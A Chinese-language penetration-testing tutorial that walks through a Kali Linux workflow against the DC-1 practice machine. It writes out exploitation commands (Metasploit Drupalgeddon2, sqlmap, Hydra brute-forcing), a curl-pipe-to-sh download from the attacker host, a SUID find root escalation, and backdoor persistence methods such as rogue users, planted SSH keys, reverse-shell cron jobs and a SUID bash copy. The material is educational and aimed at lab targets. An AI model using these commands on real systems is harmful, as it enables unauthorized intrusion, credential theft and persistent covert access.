1. 项目概述从“会用”到“精通”的靶机渗透实战每次看到有人问“Kali怎么用”、“靶机怎么打”或者在网上找一些零散的教程我就想起自己刚入门时那种迷茫。手里拿着一堆“神兵利器”却不知道从哪里下手对着一个靶机IP除了扫端口、跑目录下一步该做什么完全没头绪。这就是典型的“工具驱动”思维——你知道工具能做什么但不知道在实战中何时、何地、为何要用它。今天我想分享的就是如何构建一套“流程驱动”的渗透测试思维用一个更详细、更贴近真实渗透测试工程师工作流的视角来操作Kali和靶机。这不仅仅是工具命令的堆砌而是理解每个动作背后的意图、每个阶段的目标以及如何根据目标的反馈动态调整策略。无论你是想复现DC-1、DC-5这样的经典靶机还是挑战VulnHub上更复杂的机器这套流程都能帮你理清思路把渗透测试从一个“碰运气”的游戏变成一场有章法的“外科手术”。2. 渗透测试核心流程与阶段划分渗透测试不是乱拳打死老师傅它遵循一个相对标准化的生命周期。对于靶机环境我们可以将其简化为一个更聚焦的五个阶段循环。这个循环不是线性的而是一个根据侦察结果不断反馈、调整的迭代过程。2.1 侦察与信息收集一切行动的基础这是最容易被新手忽视却往往能决定成败的阶段。目标不是拿到shell而是尽可能多地了解你的“对手”。信息收集分为被动和主动两种。被动信息收集在不与目标系统直接交互的情况下获取信息。对于靶机这通常意味着研究靶机描述、作者提示、以及社区已有的Write-up但建议先自己尝试。在真实环境中这可能包括搜索公开的代码仓库、员工领英信息、域名历史记录等。虽然靶机环境封闭但养成这个思维习惯至关重要。主动信息收集直接与目标交互。这是我们在靶机渗透中的主要手段。主机发现确认目标存活。最常用的是ping但在渗透测试中我们经常需要绕过ICMP封锁。此时可以使用nmap的-Pn参数它假定主机存活直接进行端口扫描。# 基本ping扫描 ping -c 4 192.168.1.100 # 使用nmap进行ARP扫描同网段内非常快且可靠 nmap -sn 192.168.1.100/24 # 使用nmap跳过主机发现直接进行端口扫描 nmap -Pn 192.168.1.100端口扫描与服务识别这是信息收集的核心。不仅要找出开放端口更要精确识别运行的服务及其版本。# 快速扫描最常见的1000个端口 nmap -sV -sC -O 192.168.1.100 # 参数解释 # -sV: 版本探测 # -sC: 使用默认脚本进行扫描 # -O: 操作系统探测 # 全端口扫描速度较慢但全面 nmap -p- -sV -sC 192.168.1.100 # 针对特定服务进行更深入的脚本扫描 nmap -p 80,443 --script http-enum,http-headers 192.168.1.100实操心得不要只满足于看到“80/tcp open http”。要仔细看-sV输出的具体版本比如“Apache httpd 2.4.38 ((Debian))”。这个版本号就是后续漏洞搜索的关键。-sC运行的默认脚本有时能直接发现路径泄露、默认页面等有价值信息。Web应用侦察如果开放了80/443端口重点就来了。目录与文件枚举使用gobuster或dirb。# 使用常见字典枚举目录 gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/common.txt # 枚举特定扩展名的文件如php, txt, bak等 gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/common.txt -x php,txt,bak子域名枚举针对真实域名对于靶机如果是虚拟主机也可能有用。技术栈识别通过浏览器的开发者工具Network、Console、Wappalyzer浏览器插件或命令行工具whatweb来识别前端框架、后端语言、服务器、中间件等。whatweb http://192.168.1.100注意事项信息收集阶段要细致并做好记录。我习惯用CherryTree或简单的文本文件将IP、域名、开放端口、服务版本、发现的路径、可能的用户名从页面、源码中收集等信息全部记录下来。这是一个不断丰富的“目标档案”。2.2 漏洞分析与利用将信息转化为突破口拿到详尽的信息后就要开始分析哪里可能存在弱点。漏洞匹配将发现的服务和版本号在漏洞数据库中进行搜索。搜索sploitKali自带的强大漏洞库。# 搜索Apache 2.4.38相关漏洞 searchsploit apache 2.4.38 # 搜索Drupal相关漏洞DC系列靶机常用 searchsploit drupal在线资源NVD、Exploit-DB、CVE Details等网站。漏洞验证与利用找到可能的漏洞后不要盲目运行利用代码。阅读利用代码理解其原理和利用条件。很多利用代码需要根据目标情况修改如目标IP、端口、路径。使用Metasploit对于集成度高的漏洞Metasploit是首选。它提供了统一的接口相对安全。msfconsole # 进入Metasploit框架 search drupal # 搜索模块 use exploit/unix/webapp/drupal_drupalgeddon2 # 使用一个著名的Drupal漏洞模块 show options # 查看需要设置的参数 set RHOSTS 192.168.1.100 # 设置目标 set RPORT 80 # 设置端口 exploit # 执行利用手动利用对于简单的漏洞或为了加深理解需要手动操作。例如一个简单的SQL注入可能需要你手动构造Payload用curl发送请求或者使用sqlmap。# 使用sqlmap进行自动化SQL注入测试 sqlmap -u http://192.168.1.100/page.php?id1 --batch --dbs突破点选择通常漏洞利用的目标是获取一个初始立足点即一个反向shell或Webshell让我们能在目标服务器上执行命令。常见问题为什么我的exploit运行不成功原因可能很多目标环境与漏洞要求的不完全一致如补丁状态、配置差异、网络问题防火墙、出站限制、Payload编码问题、或者依赖的库版本不对。这时需要回到信息收集阶段确认信息的准确性并尝试调整利用参数或寻找替代利用方式。2.3 权限提升从“用户”到“管理员”拿到初始shell往往是www-data或某个低权限用户只是第一步。在Linux靶机中我们的终极目标通常是root权限。信息收集内部在获得的shell中首先进行内部侦察。用户信息id,whoami,cat /etc/passwd系统信息uname -a,cat /etc/os-release,lsb_release -a网络信息ifconfig,netstat -antp,ss -tulnp进程信息ps aux计划任务crontab -l,ls -la /etc/cron*SUID/GUID文件find / -perm -us -type f 2/dev/null可写文件/目录find / -writable -type d 2/dev/null(注意区分用户)敏感文件历史命令(history)、配置文件、数据库文件、用户目录下的文件(/home/*)。自动化脚本使用像LinPEAS或LinEnum这样的脚本进行快速、全面的信息收集。你需要将脚本上传到目标机器执行。# 在攻击机上启动HTTP服务 python3 -m http.server 8000 # 在目标shell中下载并执行假设能访问攻击机IP curl http://192.168.1.50:8000/linpeas.sh | sh # 或者 wget http://192.168.1.50:8000/linpeas.sh -O /tmp/linpeas.sh chmod x /tmp/linpeas.sh /tmp/linpeas.sh提权向量分析根据收集的信息寻找提权路径。内核漏洞如果内核版本较旧存在公开的提权exp。使用searchsploit搜索内核版本号。操作前务必在测试环境验证因为可能造成系统崩溃。SUID/GUID滥用找到具有SUID位的非常规程序。研究该程序的功能看能否利用它读取敏感文件或执行命令。例如find命令如果有SUID位可以执行任意命令find . -exec /bin/sh \; -quit。环境变量劫持如果程序以高权限运行但调用了未使用绝对路径的命令可以通过控制PATH环境变量来劫持。计划任务检查是否有计划任务以root身份运行且其脚本或目录当前用户可写。如果是可以写入反向shell代码。密码/密钥泄露在配置文件、历史记录、备份文件中寻找root或其他高权限用户的密码或SSH私钥。数据库提权如果以数据库用户身份运行可能利用数据库功能如MySQL的UDF执行系统命令。实操心得提权过程往往需要耐心和创造力。自动化脚本给出的通常是“线索”你需要手动验证每一条线索。多看看GTFOBins这个网站它整理了大量可用于提权的合法Linux二进制文件的使用方法。2.4 后渗透与权限维持拿到root权限后工作并未结束。在真实的渗透测试中你需要证明自己能够长期控制目标。信息榨取收集证明渗透成功的证据以及具有商业价值的敏感数据。标志Flag靶机中通常设置的flag.txt或proof.txt。敏感文件/etc/shadow密码哈希/home目录下的用户文件数据库文件等。网络信息进一步的内网侦察为可能的横向移动做准备。权限维持创建后门确保在连接断开或系统重启后仍能访问。添加用户useradd -m -s /bin/bash backdoor; passwd backdoor并将其加入sudo组。SSH密钥植入将你的公钥写入root或目标用户的~/.ssh/authorized_keys文件。创建定时任务在/etc/cron.hourly/等目录下创建定时反弹shell的脚本。SUID后门复制/bin/bash并设置SUID位cp /bin/bash /tmp/.bash; chmod 4755 /tmp/.bash之后可以通过/tmp/.bash -p来获取root shell。清理痕迹在授权测试中根据要求可能需要清理日志。常见日志位置/var/log/auth.log,/var/log/syslog,~/.bash_history等。注意未经授权的修改日志是违法行为靶机练习中可选择性操作以学习方法。2.5 报告与总结这是将技术活动转化为商业价值的一步。对于练习养成做笔记和总结的习惯至关重要。记录每一步用了什么命令得到了什么输出基于此做出了什么判断。截图关键步骤的截图是很好的证据。整理攻击路径用清晰的图表可以在报告阶段用绘图工具画展示从外网到获取root的完整路径。漏洞说明说明每个漏洞的原理、危害和修复建议。3. 核心工具链深度使用解析Kali自带数百个工具但核心的只有十几个。这里深入几个最关键的。3.1 Nmap不仅仅是端口扫描Nmap是侦察的瑞士军刀。除了基本的扫描其NSE脚本引擎功能强大。# 使用脚本进行漏洞扫描谨慎使用可能产生大量流量或被识别 nmap -p 80 --script vuln 192.168.1.100 # 对SMB服务进行深入枚举 nmap -p 445 --script smb-enum-shares,smb-enum-users 192.168.1.100 # 防火墙/IDS规避扫描速度慢但更隐蔽 nmap -sS -T2 --max-parallelism 1 --scan-delay 5s -Pn 192.168.1.100注意事项-A参数全面扫描虽然强大但动静也大在需要隐蔽的测试中慎用。先使用-sSSYN半开扫描快速扫端口再对开放端口进行-sV和-sC扫描是更常见的策略。3.2 Metasploit Framework一体化的利用平台MSF的核心概念是模块Modules。Exploit模块利用漏洞的代码。Payload模块漏洞利用成功后在目标系统上运行的代码如反向shell。Auxiliary模块辅助模块用于扫描、嗅探、爆破等。Post模块后渗透模块用于提权、信息收集、跳板等。工作流示例msf6 use exploit/multi/http/drupal_drupalgeddon2 # 选择利用模块 msf6 exploit(...) set RHOSTS 192.168.1.100 # 设置参数 msf6 exploit(...) set RPORT 80 msf6 exploit(...) set TARGETURI /drupal # 如果Drupal不在根目录 msf6 exploit(...) show payloads # 查看兼容的Payload msf6 exploit(...) set payload linux/x64/meterpreter/reverse_tcp # 选择Payload msf6 exploit(...) set LHOST 192.168.1.50 # 设置监听IP msf6 exploit(...) set LPORT 4444 # 设置监听端口 msf6 exploit(...) exploit # 执行如果成功你会进入meterpreter会话。meterpreter是一个高级的、功能丰富的后渗透shell可以上传下载文件、抓取密码、拍照录屏等。常见问题meterpreter会话容易掉线。可以尝试使用bind_tcppayload让目标监听端口你去连接或者在获得初始shell后立即用更稳定的方法如python反向shell重连。3.3 Burp SuiteWeb应用测试的核心Burp是一个拦截代理所有浏览器流量都经过它从而可以查看、修改请求和响应。配置浏览器代理通常设置为127.0.0.1:8080。拦截与修改在Proxy - Intercept标签页打开拦截浏览器访问页面请求会被暂停在Burp中。你可以修改任何参数如ID、Cookie然后Forward发送。重放与扫描将拦截到的请求发送到Repeater模块可以反复修改和发送用于手动测试SQL注入、XSS等。发送到Intruder模块可以对特定位置进行暴力破解如密码、验证码。主动扫描将站点地图添加到Target可以使用Scanner进行自动化的漏洞扫描社区版功能有限。实操心得对于HTTPS网站需要在浏览器中安装Burp签发的CA证书否则无法解密流量。Burp的Logger功能很好用它能记录所有经过代理的请求即使没有拦截方便事后分析。3.4 Hydra与Medusa在线密码爆破利器当发现登录入口时如果存在弱密码可以尝试爆破。# 使用Hydra爆破HTTP表单登录 hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.100 http-post-form /login.php:username^USER^password^PASS^:FLogin failed # 参数解释 # -l: 指定用户名 # -P: 指定密码字典 # http-post-form: 指定协议和表单参数 # “/login.php:...”: 这是核心部分。冒号分隔URL、POST数据、失败标识。 # FLogin failed: 表示响应中包含“Login failed”则认为失败。 # 爆破SSH密码 hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100注意事项爆破会产生大量日志极易触发账户锁定或警报。务必在授权范围内进行并在靶机环境中确认规则允许。优先使用精简的、有针对性的字典而不是直接上rockyou.txt这种巨型字典。3.5 John the Ripper Hashcat离线密码破解当你拿到了密码哈希文件如/etc/shadow后就需要离线破解。提取哈希需要将/etc/shadow中的哈希与/etc/passwd结合使用unshadow命令。unshadow passwd_file shadow_file hashes.txt识别哈希类型使用hash-identifier工具或hashcat --example-hashes来识别。使用John破解john --wordlist/usr/share/wordlists/rockyou.txt hashes.txt john --show hashes.txt # 查看破解结果使用Hashcat破解通常更快支持GPUhashcat -m 1800 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt # -m 1800: 指定哈希类型为sha512crypt ($6$)常见于Linux shadow文件 # -a 0: 字典攻击模式4. 经典靶机实战流程示例以DC-1为例让我们把上述流程应用到一个具体靶机如VulnHub上的DC-1上进行串联演示。假设靶机IP为192.168.1.100。4.1 阶段一全面侦察主机发现与端口扫描nmap -sS -sV -sC -O -p- 192.168.1.100假设我们发现开放了80/tcp (http)和22/tcp (ssh)。HTTP服务是Apache httpd网站使用了DrupalCMS。Web应用侦察whatweb http://192.168.1.100确认Drupal版本。gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/common.txt -x php,txt扫描目录。手动浏览网站查看页面源码、robots.txt发现可能有/admin、/user等路径。4.2 阶段二寻找突破点漏洞搜索searchsploit drupal 7。发现Drupal 7.x的Drupalgeddon 2漏洞CVE-2018-7600。漏洞利用方法A使用Metasploitmsfconsole use exploit/unix/webapp/drupal_drupalgeddon2 set RHOSTS 192.168.1.100 set RPORT 80 exploit成功获得一个www-data用户的shell。方法B手动利用理解原理可以使用公开的Python脚本如drupalgeddon2.py直接获取shell。python3 drupalgeddon2.py -t http://192.168.1.100 -c id4.3 阶段三权限提升内部信息收集在获得的shell中执行id确认是www-data。上传或使用linpeas.sh进行自动化信息收集。分析线索LinPEAS可能高亮显示了一些有趣的文件比如/var/www/目录下的配置文件settings.php。查看该文件cat /var/www/sites/default/settings.php。实操心得在Drupal中settings.php文件里经常包含数据库连接凭证。获取数据库凭证从settings.php中找到类似$databases[default][default]的数组里面有username和password。访问数据库使用得到的密码连接MySQL数据库。mysql -udbuser -pdbpassword -D drupal数据库提权或信息获取在Drupal数据库中用户密码哈希存储在users表里。我们可以尝试破解或者更简单——直接修改admin用户的密码哈希。Drupal 7的密码哈希可以用php快速生成。# 在攻击机上生成一个新的密码哈希假设新密码为hacked php -r echo crypt(hacked, \$S\$Cxxxxxxxx); # 这里需要正确的盐值格式更简单的方法是查Drupal的PHP代码生成。 # 实际上在靶机shell里如果有php可以直接 cd /var/www php scripts/password-hash.sh hacked然后到MySQL中更新users表的pass字段。更新后就可以用新密码hacked登录Drupal后台了。寻找提权向量继续检查LinPEAS输出。可能会发现一个具有SUID权限的不常见二进制文件或者一个以root身份运行的计划任务。在DC-1中经典的提权路径是通过find命令的SUID位。find / -perm -us -type f 2/dev/null | grep -vE /proc|/sys如果发现/usr/bin/find有SUID位则可以直接提权find . -exec /bin/sh \; -quit执行后输入id会发现变成了root。4.4 阶段四获取Flag与总结寻找FlagDC-1通常有多个flag。在/root、/home目录或其他隐蔽位置寻找flag*.txt文件用cat查看。总结报告梳理攻击路径Drupalgeddon 2 RCE - 获取www-data shell - 读取配置文件得数据库密码 - 修改管理员哈希登录后台 / 或通过SUID find提权 - 获得root权限 - 读取最终flag。5. 环境搭建与高效工作流建议5.1 靶机环境搭建虚拟机网络建议使用“桥接”或“NAT网络”模式。桥接模式使靶机和Kali处于同一物理网络像真实设备一样互访。NAT网络模式在VirtualBox或VMware中创建一个隔离的虚拟网络更安全方便。Kali维护更新源编辑/etc/apt/sources.list使用国内镜像源如阿里云、清华源以加速更新。# 备份原文件 cp /etc/apt/sources.list /etc/apt/sources.list.bak # 编辑替换为国内源 sed -i s|http.kali.org|mirrors.aliyun.com/kali|g /etc/apt/sources.list apt update apt upgrade -y工具更新apt install kali-linux-headless可以安装更多工具或使用apt install 工具名单独安装。5.2 高效工作习惯目录管理为每个靶机或项目创建一个独立的目录存放扫描结果、利用代码、笔记和截图。mkdir -p ~/靶机/DC-1/{scans,exploits,loot,notes}笔记与文档使用Obsidian、CherryTree或简单的Markdown文件实时记录。记录IP、命令、输出、思路变化。Shell管理使用tmux或screen来管理多个终端会话防止网络不稳定导致shell丢失。tmux new -s pentest # 新建会话 # Ctrlb d 分离会话 tmux attach -t pentest # 重新连接本地HTTP服务经常需要将文件如脚本、木马传到靶机。用Python快速启服务python3 -m http.server 8000 # 靶机上下载 wget http://你的Kali IP:8000/linpeas.sh渗透测试是一门需要大量实践和思考的技术。流程和工具是骨架而你的好奇心和解决问题的能力才是血肉。每一次遇到“卡住”的情况都是深入理解系统原理的绝佳机会。不要只满足于找到别人写的利用脚本并运行成功要去读脚本的代码理解它为什么能工作尝试手动去复现。从信息收集到最终提权的每一步都多问一个“为什么”和“还有什么方法”。随着你攻破的靶机越来越多这套流程会内化成你的直觉你会发现面对一个新的目标时你的思路会异常清晰。最后请务必在合法授权的环境中进行所有测试将你的技能用于建设性的安全防御。